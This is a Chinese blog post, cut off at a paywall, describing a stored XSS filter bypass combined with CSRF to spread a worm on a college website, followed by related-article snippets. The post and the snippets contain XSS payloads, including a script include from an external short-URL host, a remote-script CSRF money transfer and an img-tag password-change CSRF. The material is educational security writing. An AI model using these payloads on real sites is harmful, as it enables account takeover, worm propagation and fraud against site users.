【实战】储存XSS+CSRF(XSS绕过到蠕虫攻击)

已于 2022-05-23 09:48:28 修改
阅读量747 收藏 4
点赞数 3
分类专栏: 技术文章 文章标签: 安全 web安全
于 2022-05-23 09:47:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/XunanSec/article/details/124921435
版权
本文详细介绍了如何利用存储型XSS漏洞和CSRF漏洞构造蠕虫攻击。首先,通过一个技术学院网站的例子展示了如何绕过XSS过滤,然后利用CSRF漏洞,构造恶意链接,实现自动发表内容的功能。进一步,通过链接缩短和蠕虫传播机制,阐述了如何进行XSS蠕虫攻击,当用户访问含有恶意脚本的个人中心时,会自动发布相同内容,形成连锁反应。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x00 存储XSS

1) 可绕过的XSS

给大家分享个漏洞案例,今天上午刚把电脑修好
某技术学院储存XSS+CSRF(XSS绕过滤到蠕虫攻击)
注册处:

http://xxx.edu.cn/meol/xxxx

需要注册才能进入社区发表,先说下储存XSS,过滤了,发现可绕过
储存XSS:

http://xxx.edu.cn/meol/xxx?genre=80&type=0

他是先过滤再输出,而不是输出时过滤,从而导致可绕过 

我们发现他输入时就进行了过滤,直接替换<script>alert('XSS')</script>成功弹框:

0x01 CSRF配合XSS蠕虫

同样是这个位置,发表话题,改成get请求 

最低0.47元/天 解锁文章
web安全xss/csrf)简单攻击原理和防御方案(实战篇)
m0_71744044的博客
01-29 247
最近在学习node,就顺便写了web安全攻击的示例以及解决方案。
XSSCSRF攻击以及预防手段
南栀的博客
03-12 5012
文章目录XSS反射型持久型DOM型XSS如何防御?CSRF XSS XSS全程Cross Site Scripting,名为跨站脚本攻击,是一种常见于 Web 应用中的计算机安全漏洞。 恶意攻击者往 Web 页面里嵌入恶意的客户端脚本,当用户浏览此网页时,脚本就会在用户的浏览器上执行,进而达到攻击者的目的。 比如获取用户的 Cookie、导航到恶意网站、携带木马等。 攻击者对客户端网页注入的恶意脚本一般包括 JavaScript,有时也会包含 HTML 和 Flash。 有很多种方式进行 XSS 攻击,但它
XSRF(XSS+CSRF
weixin_30415801的博客
07-09 295
示例: 基本注入的时候,引入js文件。fish.js文件内容如下 $.post('http://localhost:3000/api/transfer', {user: 'zfkt', mone: 500}) 在表单中插入以下代码 <script src="http://locahost:3000/fish.js"></script> 转载于:...
【案例解析】一次针对XSS+CSRF构造蠕虫的渗透测试,从零基础到精通,收藏这篇就够了!
最新发布
yy1715713348的博客
03-11 982
网安教育培养网络安全人才技术交流、学习咨询首先来明确一下各自的定义跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
xsscsrf在dvwa中实现蠕虫攻击
qq_52469895的博客
04-10 581
验证csrf漏洞 我们先在自己这里改密码 然后看到上面有显示我们将上面的复制下来改为 http://127.0.0.1/DVWA-master/vulnerabilities/csrf/?password_new=111111&password_conf=111111&Change=Change# 访问成功修改 测试一下 成功 验证xss漏洞 有xss漏洞 然后实现xsscsrf蠕虫攻击xss存储型那里写入 <img src="h
一次csrf配合xss攻击实例
aiquan9342的博客
03-16 424
xss出现在我的邮箱处 alert of payload "><script>alert(/test/)</script><" by cookie of payload "><script src=http://t.cn/RxQ4lz8></script><" csrf依旧是出现在“我的...
XSS+CSRF组合拳
weixin_50464560的博客
03-12 2614
0x00 前言 今天学习一下 XSS + CSRF 组合拳,现将笔记记录如下。 0x01 靶场环境 本机(Win):192.168.38.1 DVWA(Win):192.168.38.132 Beef(Kali):192.168.38.129 0x02 组合拳思路 第一拳:存储型 XSS + CSRF(存储型 XSS 攻击代码中加入 CSRF 代码链接) 第二拳:CSRF + SelfXSSCSRF 代码中加入 SelfXSS 代码) 0x03...
实战审计cms之CSRF——CSRF+Xss+Flash钓鱼
hackzkaq的博客
05-18 627
更多渗透技能 欢迎搜索公众号:白帽子左一 作者:掌控安全-holic 前言 CSRF感觉似乎很不值钱的样子,我前几天审计出了3个后台存储xss+csrf 然后cnvd跟我说不收csrf和后台存储xss,自此后台我从不找xsscsrf 但是毕竟作为目前毕竟出名流行的一个漏洞,还是讲解一下,我会讲的很简单,ojbk 0x01 CSRF介绍 CSRF的全名为Cross-site request forgery,它的中文名为 跨站请求伪造 CSRF是一种夹持用户在已经登陆的web应用程序上执行非本意的操
以Django为例谈谈XSSCSRF攻击
Deft_MKJing的博客
05-19 1122
前言 在Web安全领域,XSSCSRF两个是最常见的攻击方式,由于最近在研究Django框架,阅读源码的同时分析下这两个攻击攻击方式和防御方式 XSS XSS,即 Cross Site Script,中译是跨站脚本攻击;在别人的站点嵌入脚本,而这个脚本原来不是属于这个站点的,所以叫跨站脚本,其原本缩写是 CSS,但为了和层叠样式表(Cascading Style Sheet)有所区分,因而在安...
预防XSS攻击和SQL注入XssFilter
05-19
XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin...
XSS攻击+CSRF攻击
weixin_34198583的博客
08-29 252
XSS攻击 一旦在DOM解析过程成出现不在预期内的改变(JS代码执行或样式大量变化时),就可能发生XSS攻击 XSS分为反射型XSS,存储型XSS和DOM XSS 反射型XSS是在将XSS代码放在URL中,将参数提交到服务器。服务器解析后响应,在响应结果中存在XSS代码,最终通过浏览器解析执行。 存储型XSS是将XSS代码存储到服务端(数据库、内存、文件系统等),在下次请求同一个页面时就不需要带...
XSS蠕虫攻击
iteye_4538的博客
09-22 1339
XSS (cross-site scripting),即跨站脚本攻击,它的本质还是一种“HTML注入”,用户的数据被当成了HTML代码一部分来执行,从而混淆了原本的语义,产生了新的语义。 来看一张某网站遭受XSS攻击后的图片, [img]http://dl2.iteye.com/upload/attachment/0101/3717/a83f235a-329f-30b0-9f85-3aa7...
xsscsrf(详解)
qq_62046696的博客
06-30 4470
感觉自己的基础漏洞原理不太牢固,那就一起来复习一下吧!!!XSS的基本概念:XSS(Cross Site Scripting):跨域脚本攻击XSS攻击原理:不需要你做任何的登录认证,它会通过合法的操作(比如在url中输入、在评论框中输入),向你的页面注入脚本(可能是js、hmtl代码块等)。大白话就是,他是再允许的范围内进行上传代码的操作,然后让被害者点击。XSS攻击后果:盗用Cookie破坏页面的正常结构,插入广告等恶意内容D-doss攻击3、XSS攻击后果:盗用Cookie破坏页面的正常结构,插入广告
实战xsscsrf
yang_zongjun的专栏
05-05 1796
web安全很早就关注过,但是xsscsrf一直都是理论学习,今天有机会实战了下先贴上onenote笔记:XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。 来自 https://zh.wikipedia.org/wiki/%E8%B7%A8%E7%AB%99%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0 xss(corss-site s
xss+csrf的组合拳
wo41ge的博客
12-16 3461
今天 就把之前学的东西简单的总结一下吧 【第一拳】存储型 XSS + CSRF
CSRFXSS组合拳
weixin_60719780的博客
01-17 1220
简单的xsscsrf的组合利用
安全(五):XSS + CSRF攻击
天威一号
11-30 192
123456
前端安全XSSCSRF
Spontaneous_0的博客
02-15 387
前端安全XSSCSRF
xss漏洞之——XSS蠕虫、DDOS攻击
wsnbbz的博客
03-04 2363
介绍 通过构造的 XSS 代码,通过精心构造的 XSS 代码,可以实现非法转账、篡改信息、删除文章、自我复制等诸多功能。 此处以更改密码为例 代码: <img hidden src='http://localhost/DVWA-master/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Chang...
Web应用安全揭秘:XSSCSRF等常见问题与防护策略
SQL注入是针对数据库的攻击攻击者通过输入恶意SQL语句,试图绕过应用程序的安全防护,直接访问、修改或删除数据库中的数据。这通常发生在未经验证和参数化查询的应用程序中。 文件上传漏洞允许攻击者上传恶意文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

巡安似海

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值